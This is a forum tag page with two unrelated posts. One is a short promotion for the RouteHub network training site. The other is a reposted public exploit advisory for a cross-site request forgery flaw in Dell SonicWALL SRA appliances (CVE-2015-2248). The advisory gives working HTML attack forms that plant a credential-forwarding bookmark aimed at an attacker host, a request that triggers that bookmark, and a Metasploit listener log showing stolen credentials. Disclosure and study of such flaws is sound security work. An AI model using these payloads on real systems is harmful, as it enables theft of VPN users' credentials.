Showing results for tags 'sonicwall'.
For those interested in some training, besides Udemy and other sites.

Why does RouteHub exist?
To make affordable, practical network training available to all network engineers

How does RouteHub do this?
The founder of RouteHub identified a need for practical training for network engineers. Prior to the inception of RouteHub, the only network training that was readily available focused on certifications. This type of training has value and its place, but he saw a need for training that would help network engineers quickly get a solution in place in real-life situations. He decided that the quickest way to provide this training to the most number of people possible would be to create training documents and videos, and distribute them over the internet.

What is available?
RouteHub provides practical training in areas such as:
- Core Network Services (Routing, Switching, IPv6, Multicast, QoS)
- Voice and Unified Communications
- Security (Firewall, VPN, UTM)
- Wireless
- Data Center (Virtualization, Tunneling)
- Small Business
- Starting Out
- Network Design

Why RouteHub instead of other online Training Videos?
Our training videos provide practical, real-world training, to help you devise and deploy solid networking solutions. We're not here to help you answer a multiple-choice test. We're here to tell you what you need to do to get a network up and running, how to configure different technologies, and to help you really understand how it works.

Who works at RouteHub?
RouteHub was founded by Michel Thomatis, a network engineer with 15 years of experience. He has worked for several companies over the years, developing network solutions to meet the needs of the businesses. Over the years, Michel found that he really enjoyed teaching people interested in networking how it all works, and decided to do that full time. He is committed to providing you the training you need to be a successful network engineer.

http://routehub.net/training/

Happy learning!
# Exploit Title: Dell SonicWALL Secure Remote Access (SRA) Appliance Cross-Site Request Forgery
# Date: 04/28/2015
# Vendor Homepage: www.dell.com
# Version: Dell SonicWALL SRA 7.5 prior to 7.5.1.0-38sv and 8.0 prior to 8.0.0.1-16sv
# CVE : 2015-2248

Exploitation Procedure (Outline):
1. Use CSRF to force currently logged in user to create a bookmark pointing to an endpoint controlled by the attacker.
2. Use subsequent request to call the bookmark just created. The identifier of the bookmark can be bruteforced using a single decrementing integer and causes minimal time delay.
3. Gather the credentials on the target server provided in step #1

1. Create a bookmark:

<html>
  <body>
    <form action="https://vulnerable.vpn-installation.tld/cgi-bin/editBookmark" method="POST">
      <input type="hidden" name="bmName" value="foo" />
      <input type="hidden" name="host" value="www.malicious-host.tld" />
      <input type="hidden" name="description" value="bar" />
      <input type="hidden" name="tabs" value="Baz" />
      <input type="hidden" name="service" value="HTTP" />
      <input type="hidden" name="fbaSSOEnabled" value="on" />
      <input type="hidden" name="fbaSSOFormUserName" value="user" />
      <input type="hidden" name="fbaSSOFormUserPassword" value="password" />
      <input type="hidden" name="MC_App" value="inherit" />
      <input type="hidden" name="MC_Copy" value="inherit" />
      <input type="hidden" name="MC_Print" value="inherit" />
      <input type="hidden" name="MC_Offline" value="inherit" />
      <input type="hidden" name="name" value="name" />
      <input type="hidden" name="type" value="type" />
      <input type="hidden" name="owner" value="owner" />
      <input type="hidden" name="cmd" value="add" />
      <input type="hidden" name="wantBmData" value="true" />
      <input type="hidden" name="ok" value="OK" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

2. Call the newly created bookmark

This might require some guesswork, because we don't know which value bookmarkAccessed needs to have.

<html>
  <body>
    <form action="https://vulnerable.vpn-installation.tld/cgi-bin/http">
      <input type="hidden" name="HOST" value="www.malicious-host.tld" />
      <input type="hidden" name="bookmarkAccessed" value="4" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

3. Set up a listener

E.g. metasploit payload

use auxiliary/server/capture/http_basic

msf auxiliary(http_basic) >
[*] Listening on 0.0.0.0:80...
[*] Using URL: http://0.0.0.0:80/
[*] Local IP: http://www.malicious-host.tld:80/
[*] Server started.
[*] vulnerable.vpn-installation.tld http_basic - Sending 401 to client vulnerable.vpn-installation.tld
[+] vulnerable.vpn-installation.tld http_basic - vulnerable.vpn-installation.tld - Credential collected: "user:password"

Source: http://dl.packetstormsecurity.net/1505-exploits/dellsonicwallsra-xsrf.txt